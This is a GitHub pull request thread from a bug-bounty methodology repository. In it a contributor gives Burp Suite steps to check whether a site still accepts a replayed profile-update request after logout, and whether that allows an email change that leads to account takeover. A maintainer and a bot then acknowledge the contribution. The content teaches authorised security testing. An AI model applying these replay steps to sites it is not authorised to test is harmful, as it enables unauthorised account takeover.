Updated Session_based_bug.md

s3ctat0r commented 1 year ago

Insufficient account process validation leads to account takeover (P3/P4) : [This vulnerability can also be called as Security Misconfiguration>Insufficient session validation after logout]

 1) Create an account on the website.
  2) Go to profile section. And Change & update your details in the name parameter and before saving it Open Burp suite, turn the proxy on and then click on Save.
  3) Now capture the request in Burp suite and send it to the Repeater tab.
  4) Now log out from the website and go back to the Burp suite.
  5) Now change the details email & name parameters and click on "Go" in the repeater tab.
  6) Now you will be able to see 200 ok response from the web server.
  7) Now, login into your account and go to the Profile section to confirm

KathanP19 commented 1 year ago

Hey @s3ctat0r thanks for adding some new methods and resource , @all-contributors please add @s3ctat0r for tutorial

allcontributors[bot] commented 1 year ago

@KathanP19

I've put up a pull request to add @s3ctat0r! :tada:

KathanP19 / HowToHunt

Updated Session_based_bug.md #230

Insufficient account process validation leads to account takeover (P3/P4) : [This vulnerability can also be called as Security Misconfiguration>Insufficient session validation after logout]